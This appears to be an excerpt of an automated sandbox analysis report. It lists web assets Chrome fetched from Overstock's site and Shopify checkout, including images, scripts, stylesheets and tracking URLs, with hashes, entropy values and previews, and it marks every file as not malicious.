                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Cv0M65dXgU8aYUOEdSkFGpmucWc18uMhHbvomjkpyX/jFa:t4Cv0MMkaNkmucv1TMJbtm2w
                                                                                                                                                                                    MD5:9F670F647686A5B31708072F8DA32306
                                                                                                                                                                                    SHA1:E0A888534E0752DE43E5D5A8983BB540A62147D1
                                                                                                                                                                                    SHA-256:A2D616CC94ABA130E9942115CE3699092838AF822F138709939ECEEED67D0F98
                                                                                                                                                                                    SHA-512:CC2E55B0889BC1B82E9316F4047EDA73A2D6667DF5EA9C19571B3A97F01D81FF479F5F6F87587D21E954E27495127B14FA526F446351B5BBC4D9183FDCE3E906
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/20200227_rating-star-full.svg
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 8 8">. <path fill-rule="evenodd" clip-rule="evenodd" d="M3.67444 0.212345L2.63552 2.41511L0.312205 2.7684C0.0139737 2.81375 -0.105114 3.19732 0.110683 3.41748L1.79181 5.13257L1.39507 7.55424C1.34414 7.86508 1.65586 8.10212 1.92259 7.9554L4.00049 6.81247L6.07838 7.9554C6.34512 8.10212 6.65683 7.86508 6.60591 7.55424L6.20916 5.13257L7.89029 3.41748C8.10609 3.19732 7.987 2.81375 7.68877 2.7684L5.36545 2.41511L4.32653 0.212345C4.19315 -0.0704562 3.80782 -0.0704562 3.67444 0.212345Z" fill="#F39019"/>.</svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5381)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5476
                                                                                                                                                                                    Entropy (8bit):5.143177580164717
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:tE7zMPnRgA+eSoqUSGZTJDg8BO4uUO04d2HpeEJWI4qY:4MbwoqUSaJDtBODUs2J64Y
                                                                                                                                                                                    MD5:10E20BE3E8E25F966CB7D9076B6A4C3D
                                                                                                                                                                                    SHA1:560EC262B6537223173CC050549E984FC1B26868
                                                                                                                                                                                    SHA-256:6D9EDFAD516AA4B68F10B9A7C620EAA3D9AA0CEC3D95A4E7D026C2DE3DFA1BEF
                                                                                                                                                                                    SHA-512:6F0CE784D8D8D6845AC5C331CEB2F80EEB89A53CB2D474AE98B415B6379CAB6B099F8F3264B45775D4CF5CCF3AFEA7A807237B39D8EDEF51E28CCC5F308E0B72
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/instant-page.js?v=473454186210797571730157903
                                                                                                                                                                                    Preview:/*! instant.page v5.2.0 - (C) 2019-2023 Alexandre Dieulot - https://instant.page/license */let _chromiumMajorVersionInUserAgent=null,_allowQueryString,_allowExternalLinks,_useWhitelist,_delayOnHover=65,_lastTouchTimestamp,_mouseoverTimer,_preloadedList=new Set;const DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION=1111;init();function init(){if(!document.createElement("link").relList.supports("prefetch"))return;const handleVaryAcceptHeader="instantVaryAccept"in document.body.dataset||"Shopify"in window,chromiumUserAgentIndex=navigator.userAgent.indexOf("Chrome/");if(chromiumUserAgentIndex>-1&&(_chromiumMajorVersionInUserAgent=parseInt(navigator.userAgent.substring(chromiumUserAgentIndex+7))),handleVaryAcceptHeader&&_chromiumMajorVersionInUserAgent&&_chromiumMajorVersionInUserAgent<110)return;const mousedownShortcut="instantMousedownShortcut"in document.body.dataset;_allowQueryString="instantAllowQueryString"in document.body.dataset,_allowExternalLinks="instantAllowExternalLinks"in d
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3679
                                                                                                                                                                                    Entropy (8bit):7.401532862134243
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:rGz5vIl/XOQ2xeb4lnaCDW+ew4ADwhqnITDdYiJswn04:rGmOQ2G4lnaCyuYtPJRL
                                                                                                                                                                                    MD5:FB28A7E3503E876C3BDF773E65F16AC1
                                                                                                                                                                                    SHA1:27D08F996906AB0B32208528BE258192D676FEC5
                                                                                                                                                                                    SHA-256:B4E60AABEDBB687A54D3D9D4225F9C4E061B0513FB0072C08BA4FD57A5FDF51C
                                                                                                                                                                                    SHA-512:F0C00C5F403CFB0F111B1FAD0D8935DCB491B94BFBC36884794445D4BE9C4CF38FBF54A67D280EA063C1F1B3AC89B6FAB59B1F43B2C103AA8160835D73B128A0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Monterey-37_22-Bathroom-Vanity-with-Top_2C-Natural-Brown-by-Martin-Svensson-Home.jpg?v=1713208167&width=250
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe................pixi............ipma...................iref........cdsc.........wmdat.......~Y !..2.......q= (..s.4..]...>+V.a.........m^f.>....W.aA...w&#dG........|%.G:.R.jx.......5.....<.^..znh........h.}V.....<..7d._h.......}.>.2%wS"..A...U..u..._O.C.3....EJ*..b..a.)..,.....K.n....C(......y.H.5..3T../;9.Z..<.k.6..m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1178
                                                                                                                                                                                    Entropy (8bit):6.1921059756353145
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:LTCpzWl/X27spAPAlXRIydOviuB11C1+/Mbt05Nk4arHSD9/gBokAVJp84Hvx3yp:LTCIl/X2YlXWI2PUZ05NPa+dg9E8+z
                                                                                                                                                                                    MD5:4ABB9FC16A0DB221BD339D45DD9BBCCB
                                                                                                                                                                                    SHA1:BA4A3FFEFACA0172D40FBD257475A2F5041EC187
                                                                                                                                                                                    SHA-256:9EC9D03D2F9E3EC2EF9BD0F46851F8F0A54159FD66E65B8A82BE69D4F1F79A70
                                                                                                                                                                                    SHA-512:7BD71E4EBC8EA4AACE06D015D54603E61FF5DB1500168AD858FC2F00A5CD0BD5AA153CE0BDC83BD0C43F5EDA9D4537E93AB66EE03BF9000A72A160D69B203596
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_0dcd52dc-2552-40bd-8eaf-2d2263be9ba8.jpg?v=1729322885&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.... ..........t......7..z.-.V.q...e..............NsP..!f....z.N."]..|*5..... .nfD'......Tz&D1s....m...{?.7.6.`.D....b.Q?*1~a.h.....b..PQ...d...d}*..5.Z..W...:..vc..........I. ..-....!..|.7AE..:.E.pS9..._=..&.F.s.E.w.E.)nR.l.Qo..../`+.!.....u..h..YM:.......n.Tj'd.#.....qv:=s|..8O......G.6;.....D......H..9A.....+.5.X.;U.$.R;'?.O........n..q..|#..j.......c.. ..1....?........'...(..........a..;._.qN..y...X.R.J<...j.....#.j...`.K..}v_K.+'......)...u..d...TP[p......EXIF....Exif..II
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2125)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2242
                                                                                                                                                                                    Entropy (8bit):4.887050978855164
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:CS1KqbDiVSUA3KDLl4LlyK1nTmXC/bcxvBqgRraYVilH92cSHVPwvI8xN1Zru88:/AqSIR6DSYK1T5Dgp7cDxS1V8xN/u88
                                                                                                                                                                                    MD5:7380D41B7A7EC47D1FADAE9987073834
                                                                                                                                                                                    SHA1:6FB61BBD731E4A77189427C9ED93C2430ED965D1
                                                                                                                                                                                    SHA-256:CCFA1AF3975658883E814C8BC38ABD2CD98A0C463862C2C88A3D7BC10E2C7E5D
                                                                                                                                                                                    SHA-512:C7B90DEB3B7CA5DA0A70D2C36C5ED2ACB11C700831DF196251B079ED4F0F9401880BF43427CB291039234637DDBD94BFFDE442F9950725BD528A2F9AE1B99CDE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-reference-pricing.css?v=160032368790096176431730157903
                                                                                                                                                                                    Preview:.reference-pricing-wrapper{font-size:14px;position:relative;color:#252525}.reference-pricing-wrapper .msrp-label{border-bottom:1px dashed;cursor:pointer}.reference-pricing-wrapper .sale-percent{color:#d50d25}.reference-pricing-wrapper .tooltip-label{position:relative;z-index:10}.reference-pricing-wrapper .tooltip-label s{border-bottom:1px dashed;cursor:pointer}.reference-pricing-wrapper .tooltip-label .msrp-label+span s{border-bottom:0;cursor:default}.msrp-percent{color:#5a5a5a}.card--product .reference-pricing-wrapper .tooltip-label.display-MSRP s{border-bottom:1px dashed;cursor:pointer}.card--product .reference-pricing-wrapper .tooltip-label.display-MSRP .msrp-label{display:none}.price .product-label{margin-top:5px}.reference-pricing-wrapper .pricing-tooltip{position:absolute;display:none;top:-5px;left:0;transform:translateY(-100%);background-color:#dadcdf;font-size:12px;color:#5a5a5a;border-radius:5px;width:max-content;padding:.85rem 1rem;max-width:20rem;white-space:normal;line-heig
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3090
                                                                                                                                                                                    Entropy (8bit):7.310136431924567
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/XrxKnpj5YGXqZjdSTtAejLRrqgzZ7cNle:N2apjaWqCTtzLRrquBcNs
                                                                                                                                                                                    MD5:462AB31B919FFBD60125AA2AFDAD0B55
                                                                                                                                                                                    SHA1:1A26ADC4B97D684B5655590DF520F3AA5F1CB169
                                                                                                                                                                                    SHA-256:00FCB3FBD4AC4481E7C06621F15B5BD8F02F55DDDFFEC9DDD4BF2EA2B90A3697
                                                                                                                                                                                    SHA-512:9EA0D2B56A865BE5A14CA8B6C504341E5B7F023F7EEE40CDC0653AEB07B5BCAA0A5DEB69B6C5FB40EA45088293DADA0B8F31C8A19C9882F2BFF272B50F347CF6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................v..)].6...>....e.*h$.+..~......A.U...0.&.....qE....M......4.yv{B...n."~.6g.......2.#1.....E.`....^.....|.1.4..o.W..ZV...%1\.....X
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (19480)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19537
                                                                                                                                                                                    Entropy (8bit):5.357139179284184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:6D9PXPfPfXfA8FotpZ+Sgm5oMbJUXkmOhS0i9IFCdxPnn:e9PXPfPfPA8FotpZ+ooMbJEsT8xP
                                                                                                                                                                                    MD5:F4FF0F4C04AE8F39B0A4F70008A51858
                                                                                                                                                                                    SHA1:D6FDD872AF68B0982E46BA858305F920CE38ED52
                                                                                                                                                                                    SHA-256:68AC01885C353EE80D265C15DBA682F37D536CE72A1014EFA8347136A0DE3A65
                                                                                                                                                                                    SHA-512:A14E1B3026D957270E524F367735913B10F23FFE161D82324251CC8DEBD939E7655D4791DF0AF30D0AA12ECA4209186284F1480B42C6C10590FA7C2141B4BCAF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useGooglePaySdk.VumOquMs.js
                                                                                                                                                                                    Preview:import{c5 as fe,gB as b,gC as Ie,gD as Re,gE as Q,gF as ve,gG as be,aZ as De,gH as Ne,gI as Oe,gJ as Ce,e as q,T as D,m as Te,fZ as T,f_ as G,fd as te,gK as Ge,dw as z,f$ as we,gL as Le,v as w,gM as ne,gN as Me,g6 as He,aO as O,aN as se,g5 as Ve,g3 as C,c7 as ke,gO as Ue,ga as Ye,q as R,gb as k,gP as ae,gQ as oe,at as B,gR as xe,J as re,gS as W,gT as F,gU as qe,gV as $,gW as ze,gX as Z,gY as Be,gZ as X,g_ as We,g$ as Fe,h0 as $e,h1 as ie,h2 as Ze,h3 as le,h4 as Je,h5 as je,h6 as Ke,h7 as Qe,h8 as Xe,aj as de,h9 as et,Z as tt,g9 as nt,ha as st,g4 as at,g0 as ot,A as rt,hb as it,y as ee}from"./app.DfgMZONA.js";class U extends Error{name="GooglePayGenericError"}class Ct extends Error{name="GooglePayCreateButtonError"}class lt extends Error{name="GooglePayDeveloperError"}class dt extends Error{name="GooglePayPaymentClientError"}class Y extends Error{name="GooglePaySubmissionError"}function ce(){return fe().currency}const ct="https://pay.google.com/gp/p/js/pay.js",ut=2,pt=0,gt={apiVersion:u
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                    MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                    SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                    SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                    SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAmBAMXl-uqNaRIFDZFhlU4=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):38717
                                                                                                                                                                                    Entropy (8bit):4.127160426173721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:NfnK2Ros0Zu157WfQPT2yE/5IxjmaHhZoFhXC2HQqIwM:NPJ2F01tJTvcgbHjUlC2HQq/M
                                                                                                                                                                                    MD5:324CF2F2347F28EA648917723FA0AC36
                                                                                                                                                                                    SHA1:06C7DFD1267FEE295A47931BD201D7C6D8749B6B
                                                                                                                                                                                    SHA-256:9A8FE7FC77D2106DF63604C7498B5AA9B473C962371680984CB4552AF8BCB452
                                                                                                                                                                                    SHA-512:C579FA081BC252761E509C9AEBB44DC2637EB72718DE6D835F08A75836098A381A1E552F2A2B4FADC477B7DE57738E4202A8DA1BB32B2B64FDAFD1FA1CFC5485
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"appName":"Overstock","serviceUrl":"jssdk.mparticle.com/v2/JS/","secureServiceUrl":"jssdks.mparticle.com/v2/JS/","minWebviewBridgeVersion":1,"workspaceToken":"37DE86A9","kitConfigs":[{"name":"Appboy","moduleId":28,"isDebug":false,"isVisible":true,"isDebugString":"false","hasDebugString":"true","settings":{"serviceWorkerLocation":null,"forwardSkuAsProductName":"False","setEventNameForPageView":"True","consentMappingSDK":null,"apiKey":"5c2ca4f1-0219-4717-859b-ca7dceb0be43","safariWebsitePushId":"web.com.overstock.app","doNotLoadFontAwesome":"True","removeEventAttributeList":"","enableEventStreamForwarding":"False","userTagsValue":"true","singleItemEventAttributeList":"","enableHtmlInAppMessages":"True","abkMinimumTriggerTimeIntervalKey":null,"push_enabled":"True","cluster":"03","register_inapp":"True","forwardScreenViews":"True","abkDisableAutomaticLocationCollectionKey":"False","abkRequestProcessingPolicyOptionKey":null,"bundleCommerceEventData":"False","userIdentificationType":"Custom
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1138
                                                                                                                                                                                    Entropy (8bit):6.0525168863319125
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:4ETCIl/X2YlXWI2PUPd9mp39+hgwzhAFmcGSD18DP:4BIl/Xflld9thgghamcdIP
                                                                                                                                                                                    MD5:79C3E8A35531F32F82871763C77DA398
                                                                                                                                                                                    SHA1:CC7A16B9A9FC934E09005926F47B588A45E75DCF
                                                                                                                                                                                    SHA-256:7E3991C1364EE837CDE207420367D8E7C0520F2409EDD3A0C33B995A859F110D
                                                                                                                                                                                    SHA-512:D8C61A9245336E24B8F8D2461CF1AD99929F6A384376FA9A73E40B3882D86CF07B0AD4F682EC5527F3E9156CDCA7931E136DFCF2AAECA57A6121268884629B44
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_b6faa586-7bcc-4256-8e69-72794d949ba8.jpg?v=1729322907&width=80
                                                                                                                                                                                    Preview:RIFFj...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!..... .....FO..FWl...`...<~#...o}.fz..Y.{.B.R.J~T<...X..".........U......`....H..;&r.r......U.^pV..^....9...J..R....9.u..=......ji...=...............k.%4...~.Y....~.)W}..|....\.._YO..B..0...4...H.%...bR.@..}.....n`.^.....-.0...#~......M%.D.'..U\0...6.Y;.U...%.....g...P$@w.x...@./.K.2....U...t.gY..BK..O,.\-$....1BV..a.C..E.78....k&.=..9...>(UZtV>..Py.Y.C..cB0....h.&.s.ZM..uhu....G_.....O..l.2..d%..e..".t%`2.=..."..'.#...."....$..w....EXIF....Exif..II*...........................V...........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (6675)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6676
                                                                                                                                                                                    Entropy (8bit):5.320501745843864
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:HlDZ3G1K6RVDLqdhIyMIeMUI46IKnfNerCiEn+bis4eUFLRHM9RWXJdBsh:HBtwKgLqd7tECiE+2s4eyLRHMzA+
                                                                                                                                                                                    MD5:37A8D12CC81772CCF9B0ED3405D71BD3
                                                                                                                                                                                    SHA1:90585CDC6EF0526B17E379126672A06F99FE1935
                                                                                                                                                                                    SHA-256:B4A875465F0884F67794DAD84FF57019B8D2425FB9454FA0FB2007DE412B36FF
                                                                                                                                                                                    SHA-512:156D44C417E558E2CC176A8398717D6E210B2AECDC6D1A37AF4EE853D334DD1A471F51CAABDE436C06288DA0FF69C558BD9F045BC48D306BE71454200D205B14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/VaultedPayment.BO3829nT.css
                                                                                                                                                                                    Preview:.agRve{padding:var(--x-spacing-large-400) var(--x-spacing-large-500);border:1px var(--x-default-color-border) solid;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.FiV0Z{width:10.857142857142858em;height:5.714285714285714em;fill:none;stroke:var(--x-default-color-border)}.mpn0m{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.KOEBK{width:3.8rem;height:2.4rem;border:1px solid rgba(0,0,0,.07);border-radius:3px;background-color:var(--x-default-color-accent-contrast)}.o0Dix{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.fmZaX{height:2.4rem;display:flex}.e3sCv{padding:var(--x-spacing-large-300);text-align:center}.hevoz{width:4.642857142857143em;fill:var(--x-default-color-border);display:block;margin:auto;margin-bottom:var(--x-spacing-large-100)}[dir=ltr] .NM5yz{left:0}[dir=rtl] .NM5yz{right:0}.NM5yz{background-color:var(--x-default-color-background-subdued);top:0;position:absolute;z-index:1;he
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                    Entropy (8bit):2.7773627950641693
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                    MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                    SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                    SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                    SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=14698185;type=overs0;cat=produ0;ord=6084905068702;npa=0;auiddc=164462539.1730294546;u1=;u2=41929634-000-010;u3=361.59;ps=1;pcor=1454163961;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533421~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0?
                                                                                                                                                                                    Preview:<html></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3841)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3842
                                                                                                                                                                                    Entropy (8bit):5.2385929831301485
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:h2ehHZOH3OXyR38RADQ+LfLDx2c8I9W82VppZTF5yd9k9zl:h2ehHZ6eCBTjLN2A9j2XTF5yql
                                                                                                                                                                                    MD5:6C6739F22C427F0C725E65C352950B68
                                                                                                                                                                                    SHA1:53F3120200C7407706A5CA1ABB1F9B44C3740655
                                                                                                                                                                                    SHA-256:E20901E5A6D830C8F7FB4A9902AF19D8232AE1C3624E9BE8ADF06ADDED3B24BD
                                                                                                                                                                                    SHA-512:0AE48CE244FEC50163E1D1DF0F47A68EBCD2263DB7EE98E455915B4DB0DE647CC2784BA1C6B450843771937D2B355F191F9512C6FFBA6BED4CBDC39A893C263C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Section.Dvvun2gq.js
                                                                                                                                                                                    Preview:import{A as T,y as _,e as E,cq as B,oT as A,mp as L,E as c,h as R,eD as x,bO as C,q as H,oU as V,a as e,az as P,aG as k,oV as w,a7 as u,V as h,bS as U,aQ as I,aa as q,a9 as Q,bT as F,oW as N,cs as f,ay as G,ab as d,kE as J,aI as $,kF as j,D as K}from"./app.DfgMZONA.js";const X=6e4;function ie({enabled:n,onTimeout:i,timeout:r=X}){const s=T(null),a=T(i);a.current=i,_(()=>{if(n)return s.current=setTimeout(()=>a.current(r),r),()=>{s.current&&clearTimeout(s.current)}},[n,r])}const Y="WPQk2",Z="qReyn",D={IconText:Y,Button:Z};function re(){const n=E(),{currentDetour:i}=B(),r=i?.type==="shopPayLogin",s=A("bottom"),a=L(s),o=c.default("block").when({viewportInlineSize:{min:"medium"}},"none"),l=r||a,[t,m]=R(l),S=x(),b=C({base:!0,medium:!1}),v=n("order_summary.title","Order summary"),z=H(()=>m(M=>!M),[]),{merchandiseLinesWithCount:O}=V();if(!b&&S)return null;if(O<=1)return e(h,{display:o,children:[e(P,{spacing:"large200",children:[e(k,{level:1,children:v}),e(w,{skipWrappingSection:!0,hideAccessibi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (966), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):966
                                                                                                                                                                                    Entropy (8bit):5.611753941083341
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:hMiRO9SoBONYp3GbgLtdifDsqQMZ2vWrDIDcac:NO8H5bO/i7ZwcR
                                                                                                                                                                                    MD5:0FDAE52CF7040D52BDB7380C6DC12474
                                                                                                                                                                                    SHA1:659D668082A154BE8FBDD05BEC4400ADC684B822
                                                                                                                                                                                    SHA-256:678FACE0365B3D59C56D1370029D21BEE04B1A928E48AE1A34927686212E0CE6
                                                                                                                                                                                    SHA-512:E660672E0AD419D3F72CD84B0C7E7963B8AA33B88008673304F2DF6C5F45AE08CD10374CA7B1CDED31EDFD9DDD4049682EEBDED6EFC89559236002B2AF07A5CD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
